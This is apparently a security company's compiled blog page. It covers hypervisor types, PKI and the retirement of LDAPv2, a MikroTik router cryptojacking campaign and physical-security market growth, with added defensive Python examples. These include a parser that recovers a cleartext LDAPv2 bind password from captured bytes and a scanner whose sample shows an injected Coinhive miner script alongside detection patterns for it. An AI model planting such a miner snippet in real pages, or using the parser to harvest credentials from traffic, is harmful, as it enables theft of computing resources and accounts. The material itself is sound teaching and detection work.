Virtual Machines and The Cloud

Cloud-based services have grown to dominate some segments of the technology industry. In many cases it is simply more economical to go to a provider such as Amazon and rent a share of its distributed computing infrastructure than to purchase and run servers on site. Here we will look at some of the options available and at which parts of an enterprise can be virtualized.

Virtualization relies on VMs, or Virtual Machines. A hypervisor such as VMware Workstation or VirtualBox runs guest operating systems, from Linux, macOS and Windows to the more specialised systems found on routers and other network appliances, on top of one physical host. Companies frequently choose virtual machines over dedicated hardware because high-traffic workloads can be served more cheaply and flexibly that way.

A hypervisor runs in one of two ways: directly on the hardware, “bare-metal”, with no operating system beneath it, or as an application on top of a conventional host operating system, which is how VMware Workstation and VirtualBox work. These are known respectively as Type 1 and Type 2 hypervisors. Either kind can manage many virtual machines on one physical machine, as long as the CPU and memory exist to do so.

Type 1 (bare-metal) hypervisors have no general-purpose OS or its device drivers competing with guests for resources and are generally regarded as the most efficient form of hypervisor with the best performance. Examples are VMware ESXi, Microsoft Hyper-V Server and the open-source KVM. They also present a smaller attack surface: there is no host OS whose compromise would expose every VM running on it, so the guests are isolated from each other by a much thinner layer of code. That is not the same as being immune. The hypervisor itself and its management interfaces remain targets, and guest-to-host escape bugs have been found in bare-metal products too, so a Type 1 host still needs prompt patching and an isolated management network.

Type 2 hypervisors carry unavoidable overhead because guest I/O passes through the host OS, and any security flaw in that host OS, whichever one it is, can potentially compromise every VM running above it. For these reasons Type 2 hypervisors are rarely used in data centers; they are found on end-user systems and in situations where performance and isolation matter less, for instance when developers test builds before release.

Both types rely on the CPU’s hardware virtualization extensions, Intel VT-x and AMD-V, though some Type 2 hypervisors can fall back on much slower software emulation when the extensions are absent or have been disabled in firmware. Checking that the extensions are actually exposed to the operating system is the first thing to verify when a hypervisor performs poorly or refuses to start a guest.
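As an added example (not code from the original article), the following script checks what a Linux host actually exposes: it parses text in /proc/cpuinfo format and reports VT-x (flag “vmx”), AMD-V (flag “svm”) and whether the machine is itself a guest (flag “hypervisor”), which is the case where nested virtualization would be needed. The two cpuinfo samples embedded in it are constructed, not captured from real hardware.

```python
"""Check whether a Linux host exposes the CPU extensions a hypervisor needs.

Added example; not code from the original article. It parses text in
/proc/cpuinfo format and reports Intel VT-x (flag "vmx"), AMD-V (flag "svm")
and whether the machine is itself a guest (flag "hypervisor"). The two samples
below are constructed, not captured from real hardware.
"""
import os

# Constructed sample: a bare-metal Intel host with VT-x enabled in firmware.
SAMPLE_BARE_METAL = """\
processor\t: 0
vendor_id\t: GenuineIntel
model name\t: Intel(R) Xeon(R) CPU (constructed sample)
flags\t\t: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ht syscall nx lm vmx smx ept vpid aes xsave avx
"""

# Constructed sample: a guest VM whose outer hypervisor does not expose VT-x.
SAMPLE_GUEST = """\
processor\t: 0
vendor_id\t: GenuineIntel
model name\t: Intel(R) Xeon(R) CPU (constructed sample)
flags\t\t: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 syscall nx lm hypervisor aes xsave avx
"""


def cpu_flags(cpuinfo_text: str) -> set:
    """Union of every 'flags' line in the text (one line per logical CPU)."""
    flags = set()
    for line in cpuinfo_text.splitlines():
        key, sep, value = line.partition(":")
        if sep and key.strip() == "flags":
            flags.update(value.split())
    return flags


def virt_support(cpuinfo_text: str) -> dict:
    """Which virtualization extensions are visible, and whether we are a guest."""
    flags = cpu_flags(cpuinfo_text)
    return {
        "vt_x": "vmx" in flags,            # Intel VT-x
        "amd_v": "svm" in flags,           # AMD-V
        "in_guest": "hypervisor" in flags,  # set by the outer hypervisor for guests
    }


def verdict(support: dict) -> str:
    """Short classification a practitioner can act on."""
    ext = "VT-x" if support["vt_x"] else "AMD-V" if support["amd_v"] else None
    if ext and support["in_guest"]:
        return f"nested: {ext} exposed to this guest"
    if ext:
        return f"hardware-assisted: {ext} available"
    if support["in_guest"]:
        return "guest without extensions: enable nested virtualization on the outer hypervisor"
    return "no extensions: absent or disabled in firmware, software emulation only"


def kvm_usable() -> bool:
    """/dev/kvm only appears once the kvm module loaded, i.e. the kernel found VT-x/AMD-V."""
    return os.path.exists("/dev/kvm")


if __name__ == "__main__":
    for name, text in (("bare-metal sample", SAMPLE_BARE_METAL), ("guest sample", SAMPLE_GUEST)):
        print(f"{name}: {verdict(virt_support(text))}")
    try:
        with open("/proc/cpuinfo") as fh:
            print(f"this machine: {verdict(virt_support(fh.read()))}; /dev/kvm present: {kvm_usable()}")
    except OSError:
        print("this machine: /proc/cpuinfo not available (not Linux)")
```

A flag in cpuinfo only proves the CPU has the feature; if /dev/kvm is still missing on a bare-metal Linux host, the extension is usually disabled in the BIOS/UEFI setup.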

The appeal of virtual machines is obvious. Where a physical fleet of servers was once needed to support even a fairly basic enterprise, companies can now subscribe to a service that hosts the storage and processing power off-site. Virtualization moves this infrastructure into a logical space and cuts the cost and physical footprint of a sprawling on-site network. The attack surface does not disappear; it is concentrated in the hypervisor and its management plane, which must be protected accordingly. Firewalls are often virtualized today, as are the single sign-on and user authentication services that end users depend on.


Source: vapour-apps.com

————————————————————————————–

Contact us at     admin@gostst.com

   or call 24/7        (210)-446-4863

PKI (Public Key Infrastructure) and LDAPv2

Public Key Infrastructure (PKI) is the set of standards, roles and procedures needed to issue, distribute, validate and revoke digital certificates, which bind a public key to the identity of its holder, so that parties who have never met can authenticate each other and set up encrypted communication. PKI allows information to be moved securely through networks and is used in a vast array of network-based activities. Each participant holds a key pair: the private key is kept secret by its owner, while the public key is published, usually inside a certificate signed by a Certificate Authority (CA) and held on a server. Anything signed with the private key can be verified with the public key, and anything encrypted to the public key can be decrypted only with the private key.

Fundamentally, PKI is built on public-key cryptography, and the same asymmetry is what makes modern ransomware work, even though no certificates or CAs are involved. The threat actor embeds a public key in the malware; the victim’s files (or the per-file symmetric keys) are encrypted to that public key, and only the matching private key, which never leaves the attacker’s infrastructure, can decrypt them. Upon payment of the ransom the attacker, hopefully, releases the private key or a decryptor containing it.

PKI is also used in industries such as banking and generally wherever a password alone is insufficient to confirm the identity of the parties involved.

——————————————————————————————————

RFC and Internet Draft

Internet-Drafts (I-Ds) are working documents of the IETF and its working groups. They are not standards: many simply expire after six months, while others, after revision and review within the working group and by the IESG, are published as RFCs (Request for Comments). Some RFCs are adopted on the standards track; others are informational, experimental or, for retired protocols, historic.

LDAPv2

Here we will take a look at one particular standard, LDAPv2. LDAP stands for Lightweight Directory Access Protocol; version 2 (RFC 1777) was developed in 1995 as a vendor-neutral protocol for accessing X.500-style directories over TCP/IP, and its age shows. According to RFC 3494, the document that reviews it, LDAPv2 does not support modern authentication mechanisms such as Kerberos V.

One of a directory’s core functions is the central storage of usernames and their credentials, which makes the protocol’s weaknesses serious. In the document at datatracker.ietf.org/doc/rfc3494, LDAPv2 is recommended for retirement in part because it fails to “provide any mechanism for data integrity or confidentiality”: a simple bind sends the password across the network in cleartext, and there is no way to upgrade the connection to TLS. The text goes on to describe LDAPv3 and its support for stronger authentication (SASL) and confidentiality (TLS, via the StartTLS operation), which more adequately fulfils the “CIA” (confidentiality, integrity, availability) model of information security. The author recommends moving LDAPv2 to “Historic” status, meaning that developers should treat it as obsolete, stop using it, and assume it is exploitable.
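To make the “no confidentiality” point concrete, here is an added example, not code from the article or from RFC 3494, that BER-encodes an LDAP simple BindRequest exactly as it goes on the wire (tags per the ASN.1 in RFC 1777 and RFC 4511) and then parses it back the way a passive sniffer on the directory segment would. The DN and password are constructed. For contrast it also encodes the LDAPv3 StartTLS ExtendedRequest, the operation LDAPv2 lacks.

```python
"""Encode and parse an LDAP simple BindRequest to show what LDAPv2 puts on the wire.

Added example; not code from the original article or RFC 3494. The BER tags
follow the LDAPMessage/BindRequest ASN.1 in RFC 1777 (v2) and RFC 4511 (v3);
the DN and password used below are constructed. In LDAPv2 the only way to send
a password is the 'simple' choice, a plain OCTET STRING, and the protocol has
no StartTLS, so the credential crosses the network in cleartext.
"""

# Universal and application tags used by the LDAP PDUs below
TAG_INTEGER = 0x02
TAG_OCTET_STRING = 0x04
TAG_SEQUENCE = 0x30
TAG_BIND_REQUEST = 0x60      # [APPLICATION 0], constructed
TAG_EXTENDED_REQUEST = 0x77  # [APPLICATION 23], constructed (LDAPv3 only)
TAG_CTX0_PRIMITIVE = 0x80    # [0]: simple authentication / requestName
STARTTLS_OID = b"1.3.6.1.4.1.1466.20037"  # RFC 2830 / RFC 4511


def _length(n: int) -> bytes:
    """BER definite length: short form below 128, long form otherwise."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def _tlv(tag: int, value: bytes) -> bytes:
    return bytes([tag]) + _length(len(value)) + value


def _integer(n: int) -> bytes:
    """Non-negative INTEGER (enough for messageID and protocol version)."""
    return _tlv(TAG_INTEGER, n.to_bytes(max(1, (n.bit_length() + 8) // 8), "big"))


def encode_simple_bind(message_id: int, version: int, dn: str, password: str) -> bytes:
    """LDAPMessage { messageID, BindRequest { version, name, simple password } }."""
    bind = (_integer(version)
            + _tlv(TAG_OCTET_STRING, dn.encode())
            + _tlv(TAG_CTX0_PRIMITIVE, password.encode()))  # the password, unprotected
    return _tlv(TAG_SEQUENCE, _integer(message_id) + _tlv(TAG_BIND_REQUEST, bind))


def encode_starttls(message_id: int) -> bytes:
    """LDAPv3 ExtendedRequest asking the server to upgrade the connection to TLS.
    A v3 client sends this before binding; LDAPv2 has no equivalent operation."""
    ext = _tlv(TAG_CTX0_PRIMITIVE, STARTTLS_OID)
    return _tlv(TAG_SEQUENCE, _integer(message_id) + _tlv(TAG_EXTENDED_REQUEST, ext))


def _read_tlv(buf: bytes, pos: int):
    """Return (tag, value, position just after this element)."""
    tag, first = buf[pos], buf[pos + 1]
    pos += 2
    if first < 0x80:
        length = first
    else:
        nbytes = first & 0x7F
        length = int.from_bytes(buf[pos:pos + nbytes], "big")
        pos += nbytes
    return tag, buf[pos:pos + length], pos + length


def parse_simple_bind(msg: bytes):
    """Recover (messageID, version, dn, password) from a captured LDAPMessage,
    or None if it is not a simple bind. A passive sniffer can do this to every
    LDAPv2 bind it sees, because nothing in the PDU is encrypted."""
    tag, body, _ = _read_tlv(msg, 0)
    if tag != TAG_SEQUENCE:
        return None
    tag, mid, pos = _read_tlv(body, 0)
    if tag != TAG_INTEGER:
        return None
    tag, op, _ = _read_tlv(body, pos)
    if tag != TAG_BIND_REQUEST:
        return None
    _, ver, pos = _read_tlv(op, 0)
    _, dn, pos = _read_tlv(op, pos)
    auth_tag, auth, _ = _read_tlv(op, pos)
    if auth_tag != TAG_CTX0_PRIMITIVE:
        return None  # SASL bind ([3]); no cleartext password inside the PDU
    return int.from_bytes(mid, "big"), int.from_bytes(ver, "big"), dn.decode(), auth.decode()


if __name__ == "__main__":
    pdu = encode_simple_bind(1, 2, "cn=admin,dc=example,dc=com", "s3cret")  # constructed
    print("LDAPv2 bind PDU:", pdu.hex())
    print("password visible in PDU:", b"s3cret" in pdu)
    print("recovered by sniffer:", parse_simple_bind(pdu))
    print("LDAPv3 StartTLS request:", encode_starttls(1).hex())
```

An LDAPv3 client sends the StartTLS request first and performs the bind only after the TLS handshake, so the same BindRequest bytes are then wrapped in the encrypted stream; an LDAPv2 client has no such step, which is exactly the gap RFC 3494 describes.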

——————————————————————————————————

The Pros and Cons of PKI

There is an argument to be made that in some cases PKI is simply unnecessary, especially when it is easier to deploy two-factor authentication such as OTP (One Time Password) tokens or smart cards. Maintaining a PKI can be complicated, time-consuming and expensive, so some organizations outsource the job. The primary advantage of public-key authentication, for example in SSH (Secure Shell), is its high degree of security: as long as the private key is kept secret (and protected by a passphrase), a threat actor has no password to guess, so dictionary and brute-force attacks against the login are pointless. That holds only if password authentication is actually switched off on the server; a host that accepts both keys and passwords is still exposed to password guessing.

——————————————————————————————————

To sum up, the advantage of PKI lies in the fact that it is vastly more secure than a simple password system: there is no password stored on the server for a threat actor to steal or crack, and impersonating a user requires obtaining that user’s private key (and, where one is set, its passphrase).

The disadvantages are primarily operational: issuing, distributing, rotating and revoking keys and certificates is work that grows with the size of the environment and is easy to get wrong at scale. Furthermore, in some situations a full PKI could simply be overkill, and two-factor authentication with OTP tokens may be the better option; note that smart cards such as the CAC are themselves PKI-based, so choosing them means consuming someone else’s PKI rather than avoiding one.
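The caveat above, that key-based SSH only defeats password guessing when no password path remains, is easy to check mechanically. The following is an added example, not code from the article: it parses an sshd_config the way sshd does (first value for a keyword wins, keywords are case-insensitive, “#” starts a comment) and flags the settings that leave password login open. Both sample configurations are constructed; conditional Match blocks are deliberately not evaluated, which is a simplification of the real semantics.

```python
"""Flag sshd_config settings that leave a password path open beside public-key auth.

Added example; not code from the original article. The parsing rules (first
value for a keyword wins, keywords are case-insensitive, '#' starts a comment)
follow sshd_config(5); conditional Match blocks are skipped here, which is a
simplification. Both sample configurations are constructed.
"""
import re

# OpenSSH defaults applied when a keyword is absent (OpenSSH 7.x and later).
DEFAULTS = {
    "pubkeyauthentication": "yes",
    "passwordauthentication": "yes",
    "kbdinteractiveauthentication": "yes",
    "permitrootlogin": "prohibit-password",
    "permitemptypasswords": "no",
}

# Constructed: the kind of stock config the brute-force warning applies to.
WEAK_CONFIG = """\
# constructed sample
Port 22
PermitRootLogin yes
PasswordAuthentication yes
ChallengeResponseAuthentication yes
UsePAM yes
"""

# Constructed: key-only login, with a Match block this audit does not evaluate.
HARDENED_CONFIG = """\
# constructed sample
Port 22
PubkeyAuthentication yes
PasswordAuthentication no
KbdInteractiveAuthentication no
PermitRootLogin prohibit-password
PermitEmptyPasswords no
UsePAM yes
Match Address 10.0.0.0/8
    PasswordAuthentication yes
"""

# "Keyword value" or "Keyword=value"
_DIRECTIVE = re.compile(r"^(\S+?)(?:\s*=\s*|\s+)(.*?)\s*$")


def parse_sshd_config(text: str) -> dict:
    """Effective global settings: lowercase keyword -> value, first occurrence wins."""
    effective = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = _DIRECTIVE.match(line)
        if not m:
            continue
        key, value = m.group(1).lower(), m.group(2)
        if key == "match":
            break  # later lines apply only to matching connections; not audited here
        if key == "challengeresponseauthentication":
            key = "kbdinteractiveauthentication"  # older name for the same option
        effective.setdefault(key, value)  # sshd keeps the first value it reads
    return effective


def audit_sshd_config(text: str) -> list:
    """Return findings; an empty list means no password-based login path remains."""
    cfg = {**DEFAULTS, **parse_sshd_config(text)}
    low = {k: v.lower() for k, v in cfg.items()}
    findings = []
    if low["pubkeyauthentication"] != "yes":
        findings.append("PubkeyAuthentication is off: key-based login unavailable")
    if low["passwordauthentication"] != "no":
        findings.append("PasswordAuthentication is not 'no': passwords can still be guessed")
    if low["kbdinteractiveauthentication"] != "no":
        findings.append("KbdInteractiveAuthentication is not 'no': PAM can still prompt for a password")
    if low["permitrootlogin"] == "yes":
        findings.append("PermitRootLogin yes: root accepts password login")
    if low["permitemptypasswords"] == "yes":
        findings.append("PermitEmptyPasswords yes: accounts with blank passwords can log in")
    return findings


if __name__ == "__main__":
    for name, text in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(name, audit_sshd_config(text) or ["OK: key-only login"])
```

On a real host, run it against the output of `sshd -T`, which prints the fully resolved configuration including defaults, rather than against the raw file; that sidesteps both the defaults table and the Match simplification.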

Source: datatracker.ietf.org/doc/rfc3494

——————————————————————————————————


Cryptojacking Attack Infects Thousands of ISP-Grade Routers

Cryptomining scripts, often referred to as cryptojacking, are a subtle form of malware designed to harness your CPU to mine cryptocurrency for whoever deployed them. The malware spreads through infected files and the usual vectors of transmission, and browser-based mining can also take place, with or without your tacit consent, on websites, especially those associated with torrenting and the distribution of copyrighted material.

In this case, however, a more sophisticated approach was taken to extend the reach of the mining campaign: compromising carrier-grade routers of the kind used by ISPs. The campaign compromised “tens of thousands of MikroTik routers to embed Coinhive cryptomining scripts in websites using a known vulnerability.” (threatpost.com)

Censys.io reported over 170,000 active MikroTik devices serving the Coinhive script with the same site key; a single site key across all infections indicates that one entity is behind the attacks. Although the campaign initially targeted Brazil, infections kept growing internationally, and a search on Shodan (a search engine for Internet-connected devices, widely used by security researchers) showed tens of thousands of compromised routers outside Brazil.

MikroTik routers are deployed by large enterprises and ISPs and carry the web traffic of many thousands of users each day. A single compromised device therefore lets the threat actor inject the miner into every page those users load, which could pay out handsomely.

“This is a warning call and reminder to everyone who has a MikroTik device to patch as soon as possible,” Trustwave researcher Simon Kenin wrote. “This attack may currently be prevalent in Brazil, but during the final stages of writing this blog, I also noticed other geo-locations being affected as well, so I believe this attack is intended to be on a global scale.”

“We’re … talking about potentially millions of daily pages for the attacker,” Kenin wrote. “The attacker wisely thought that instead of infecting small sites with few visitors, or finding sophisticated ways to run malware on end-user computers, they would go straight to the source: carrier-grade router devices.”

————————————————————————————–

Known Vulnerabilities 

Because the attack relies on a known vulnerability, it is a prime example of the risk enterprises of all sizes run when they delay or block installation of vendor patches: MikroTik had already fixed the flaw in an earlier RouterOS release, and every router hit by this campaign was one that had not been updated.

Whoever is behind the attack, it appears they have an intimate understanding of the functionality of this particular router.

“Initial investigation indicates that instead of running a malicious executable on the router itself, which is how the exploit was being used when it was first discovered, the attacker used the device’s functionality in order to inject the CoinHive script into every web page that a user visited,” explained Kenin.

Anyone operating a MikroTik router should make sure that RouterOS is current with security patches, lest they fall prey to this or the next campaign built on the same flaw.

End users have a few options as well: cryptojacking can be blocked in the browser itself (for example with the MinerBlock extension) or at the local firewall (using CoinBlockerLists). Because the Coinhive script is injected into plaintext HTTP traffic, an in-path router cannot tamper with pages fetched over HTTPS, so forcing requests over HTTPS avoids the injection, depending of course on whether the site being accessed supports it. That protects the browser session; it does not repair the router.
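For anyone who wants to check their own traffic or crawl results for this kind of injection, here is an added example, not code from the article or from the Trustwave write-up. It scans page bodies for the Coinhive loader script and the site key it would mine for, then correlates hits by key, the same grouping that showed one operator was behind all the MikroTik infections. The HTML pages and hostnames are constructed, and the site key in them is a placeholder, not the key observed in the real campaign.

```python
"""Scan page bodies for an injected Coinhive loader and correlate hits by site key.

Added example; not code from the original article or the Trustwave write-up.
The HTML samples are constructed and the site key in them is a placeholder,
not the key seen in the MikroTik campaign. Grouping infected pages by site key
is the kind of correlation that showed one operator was behind all of them.
"""
import re
from collections import Counter

# Coinhive's loader URL and browser API as they appeared at the time (the service shut down in 2019).
LOADER_RE = re.compile(
    r"<script[^>]*\ssrc=[\"']?(?:https?:)?//coinhive\.com/lib/coinhive\.min\.js", re.I)
SITE_KEY_RE = re.compile(
    r"CoinHive\.(?:Anonymous|User)\(\s*[\"']([A-Za-z0-9]{20,64})[\"']", re.I)
START_RE = re.compile(r"\.start\(\s*\)")

# Constructed samples: two pages carrying the same injected miner, one clean page.
PLACEHOLDER_KEY = "EXAMPLEKEYEXAMPLEKEYEXAMPLEKEY00"  # constructed, 32 chars like real keys
INJECTED_SNIPPET = (
    '<script src="https://coinhive.com/lib/coinhive.min.js"></script>'
    f"<script>var miner = new CoinHive.Anonymous('{PLACEHOLDER_KEY}');miner.start();</script>"
)
PAGES = {
    "http://news.example/index.html": f"<html><head><title>News</title>{INJECTED_SNIPPET}</head><body>..</body></html>",
    "http://shop.example/cart": f"<html><head>{INJECTED_SNIPPET}</head><body>cart</body></html>",
    "http://clean.example/": "<html><head><title>Clean</title></head><body>no miner here</body></html>",
}


def scan_page(html: str) -> dict:
    """Report whether the page loads the miner, which key it mines for, and if it starts it."""
    key = SITE_KEY_RE.search(html)
    return {
        "loader": bool(LOADER_RE.search(html)),
        "site_key": key.group(1) if key else None,
        "started": bool(START_RE.search(html)),
    }


def infected_pages(pages: dict) -> dict:
    """URL -> site key for pages that both load the miner and name a key."""
    hits = {}
    for url, html in pages.items():
        result = scan_page(html)
        if result["loader"] and result["site_key"]:
            hits[url] = result["site_key"]
    return hits


def keys_by_count(pages: dict) -> Counter:
    """How many pages mine for each site key; one dominant key suggests one operator."""
    return Counter(infected_pages(pages).values())


if __name__ == "__main__":
    for url, key in infected_pages(PAGES).items():
        print(f"{url}: injected miner, site key {key}")
    print(keys_by_count(PAGES).most_common())
```

The patterns match the unmodified Coinhive loader; campaigns that proxy the script through another host or obfuscate the call will not trigger them, so treat a hit as confirmation and a miss as inconclusive.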


Source: Threatpost.com  

————————————————————————————–

$119.4 Billion: Projected Growth of Physical Security Market by 2023

 

Simply put, the physical security market consists of all the security solutions you can walk up to and touch. Cameras, virtual gate guard systems, HOA management systems and more all have elements of physical security. Of course, because all of these solutions are deeply integrated with network and cloud-based technologies, cybersecurity could be considered equally important, but it is not what we are looking at in this article.

 

As risk continues to rise, with rapid technological progress sometimes leaving vulnerabilities unchecked, demand for physical security, the tried and true barrier between real assets and those seeking to steal or destroy them, will grow along with it.

 

A combination of public fear generated by media coverage of terror attacks, advances in technology in general, and the growing use of IP cameras for video surveillance is expected to drive the growth of the physical security market worldwide.

According to this report (https://www.researchandmarkets.com/research/snkm2j/global_physical?w=5), the market is expected to grow from $84.1 billion in 2018 to $119.4 billion by 2023, a CAGR (compound annual growth rate) of 7.3%.

 

The report details how the services segment of the market is expected to show the fastest growth. Much of that work consists of upgrading existing video surveillance with digital (IP) cameras and integrating them into modern IT and network environments.

 

Of course, the larger enterprises are expected to be at the bleeding edge as this all occurs over the next few years, but this doesn’t mean that small or medium businesses need to miss out. While the big players have the greatest pools of revenue to draw from and more infrastructure to protect, the smaller enterprises can see just as much or greater benefit by implementing integrated IP-based physical security sooner rather than later. The best time to step up your security will always be before the attack comes, and not as a reactive measure.

 

 Security Technology of South Texas is a leading provider of cutting-edge physical security products. We have the experience and attention to detail to give you the best for your money when it comes to IP cameras, access control solutions, monitored video, and more.

—————————————————————————————————————————
Source: https://securitytoday.com